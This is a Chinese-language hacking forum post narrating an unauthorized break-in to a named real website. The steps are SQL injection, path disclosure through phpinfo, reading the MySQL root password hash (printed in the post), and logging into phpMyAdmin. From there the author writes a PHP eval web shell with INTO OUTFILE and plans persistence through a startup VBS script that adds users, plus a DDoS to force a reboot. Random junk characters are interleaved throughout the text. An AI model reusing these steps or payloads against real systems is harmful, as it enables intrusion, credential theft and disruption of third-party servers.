第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏5 y" _) K# l4 I1 {, w! B7 C
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!
3 }; j1 G4 j/ t6 S, }5 `" G8 |* O
3 N$ i0 [+ S4 y. Q. \
m6 p; j% W8 T2 K常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 , W5 q; G8 V7 ?8 z" ~) C' L
! ?/ e4 d$ H$ e8 E5 N- ~
那么想可以直接写入shell ,getshell有几个条件:
2 G/ ~3 D# F! z% d- V6 }1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF
, l6 d* D" _! w+ ^3 [
8 H3 E. U/ q7 b, R. a试着爆绝对路径:
, E v8 z* m# o' Q1./phpMyAdmin/index.php?lang[]=1
9 L: i# X; y' k6 R5 z2./phpMyAdmin/phpinfo.php & ?; f+ I0 I4 |4 v& O# E/ V& o
3./load_file() 9 ~- D; s: R- H( y
4./phpmyadmin/themes/darkblue_orange/layout.inc.php / z k ?2 I1 g4 t( X' C2 |
5./phpmyadmin/libraries/select_lang.lib.php
# i. O- a7 J# _% W6 H4 G) x6./phpmyadmin/libraries/lect_lang.lib.php . u9 Q9 o8 C$ n5 V$ k& N# E( E
7./phpmyadmin/libraries/mcrypt.lib.php
e; ^9 q! B6 E: r- C' {8./phpmyadmin/libraries/export/xls.php 0 \ _% u3 Y9 \- {
4 P5 q% f5 c- o' U2 {
均不行...........................
8 k6 ~. N6 c6 |8 n& O {4 _/ r. B5 m, C: U p! w
御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
M# U; u. \# C# Y+ l, l, u: G) ~ S4 |4 ~1 R
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
7 I( A( A5 ~7 [3 L7 p' ~
, k7 e: s) u/ z' e, ?默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
4 j. q6 a/ ~* y* ]6 Q g% g) y4 w0 F. N. x% [
敏感东西: http://202.103.49.66/Admincp.php 社工进不去........... # v+ Q# O* M0 G% G4 j/ T- i; k
# g. L* ]! K o! i
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell : h8 n8 m! j/ r1 m
* r' e6 D" Y0 m" K: e6 g' G
http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini ) f/ B. u# R) Z# ^* ~+ C% h
! g& n7 ^" A* Q/ b自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
* a) o; l q; W* c( a# q% S
1 h) T$ ] A/ u4 N成功读到root密码: 9 t) E% u; B& Y& U, J
) W3 u6 M0 C' x0 }- F
17---- r(0072)
1 e$ E9 g' W5 t; s8 x- O5 H7 q18---- o(006f)
5 c K# z' o U/ L6 [0 K4 D% X. k19---- o(006f)
. e6 t7 Y4 \8 \3 Y: _20---- t(0074)
8 _7 j: g! ~ ]21---- *(002a)
8 S0 o: d1 X# |+ e22---- 8(0038)
" [* l1 v6 I! O7 _23---- 2(0032) + \( ?/ q; B+ R4 C$ [
24---- E(0045) 7 ?) e1 K# p' x6 G# S& E6 B/ W% M
25---- 1(0031)
) d1 u7 B0 b$ J1 D; B4 Y26---- C(0043) 2 w0 x( g4 f; k; u0 w; Y
27---- 5(0035) 1 |* i0 P( I1 \% O* y
28---- 8(0038)
8 o& E4 M9 p' r( g* b1 W4 s4 e29---- 2(0032)
* B1 b: o+ W& O9 I: Q30---- 8(0038)
( i8 W0 E& X) }31---- A(0041) & q1 v; W( t$ P7 `: V& F+ ]: t
32---- 9(0039)
; \( X0 b, t: \33---- B(0042) , z5 M! J1 k& Q1 Y
34---- 5(0035) : B) T) q) q: @1 q5 f: z
35---- 4(0034)
& K8 u# @. x, W4 Z2 M r8 v36---- 8(0038)
. J+ Q! E+ e6 L# B37---- 6(0036)
9 Z: G1 R. e% a38---- 4(0034) ( }0 v7 r$ W: U
39---- 9(0039) 4 ^0 a+ c* J' Y3 N
40---- 1(0031) 2 R5 G# V+ j/ `3 _: A
41---- 1(0031) $ |4 N3 R3 Y* Q* _1 O* H. k
42---- 5(0035) ( j: A4 b- T2 b
43---- 3(0033)
1 ?2 ?/ H9 p o- _2 l ^44---- 5(0035)
" n5 @, L9 ?3 A: O1 `: }) Z# `! q45---- 9(0039)
( O: b- L3 h0 e46---- 8(0038) 4 q1 l6 n9 a% N' d, g4 f( D/ z
47---- F(0046)
" h2 I9 |8 q4 H6 u& _48---- F(0046)
# Z4 T* m. m) Z4 o. y+ N9 m+ U49---- 4(0034) $ G/ \& H0 `( P. G6 k' B5 A
50---- F(0046) ; d% P5 l# i" x" V% K9 y$ w: h
51---- 0(0030) . M- k* V- L; Y; o3 |
52---- 3(0033) x. D1 l& p# Z, N. @8 ~! }+ T; T# E
53---- 2(0032)
- k/ n! D e7 s1 q: x54---- A(0041) 5 L7 c& {5 I5 U6 L7 n# S& V0 j# `
55---- 4(0034)
4 [) P# f N. ]7 D K56---- A(0041)
% X: ?( l% e* ~, U* `: P4 {/ A57---- B(0042) - m! \! M4 P/ d3 y
58---- *(0044)
$ ]/ K1 I7 ^4 u5 g1 C+ u/ w4 V2 R59---- *(0035) 1 I/ M, a, ~# w( G; j3 I
60---- *(0041)
9 b: w4 Y# r* ^% Q. J61---- *0032) # v- c- g, ]0 W; q' U
& c+ }" q1 S( q+ n( ^4 z; B解密后成功登陆phpmyamin
* s x9 I4 E1 f. F5 N9 V
& U) Y" V/ b1 E7 D! C. c, f
7 _) W: |. P: u- V9 q- a5 k% l0 ]
) T5 o, d: M' Q t/ h0 e
( `- s' s% A4 W, z找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php' * Z" ?5 ? B, o
6 K4 q% h: L3 D. }6 P- t% z) @成功执行,拿下shell,菜刀连接:
3 N3 x" Y# R; G* ~. b
; A y! P5 z- z6 R服务器不支持asp,aspx,php提权无果...................
# I: d* `$ m' v8 n: }( [6 J g6 R1 [0 _' k0 h, Z
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
0 y: g) p" e+ I5 H0 B! T7 [/ |服务器上已经有个隐藏帐号了 5 Y% O. P) V& E% d, y
别名 administrators* i4 Y( g! D- N& y8 C+ G' G
注释 管理员对计算机/域有不受限制的完全访问权 9 V! H4 F7 D, h o6 y
成员 * Y' g: J/ t, g1 R
-------------------------------------------------------------------------------
2 F! d' ^6 M g+ {: \admin
3 T/ n8 ~1 D8 { C6 m0 SAdministrator v0 T9 r. s& U4 J1 z1 C, e% r
slipper$1 J/ P1 D: D0 ], K8 j3 |0 }
sqluser
, R! N' ]' ]3 u命令成功完成。 ( P) _, Y' L" ?) M, y6 K% _: x
8 U0 p S! a* b y1 e
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。5 e5 P4 w4 S. p \% G
?1 M3 Q, F' `ddos服务器重启,不然就只能坐等服务器重启了...............................
# q+ ?3 m. z+ L, ]9 W2 E0 A7 z0 K# J" j m' O* c# H) W
. [/ V4 W, G! J
|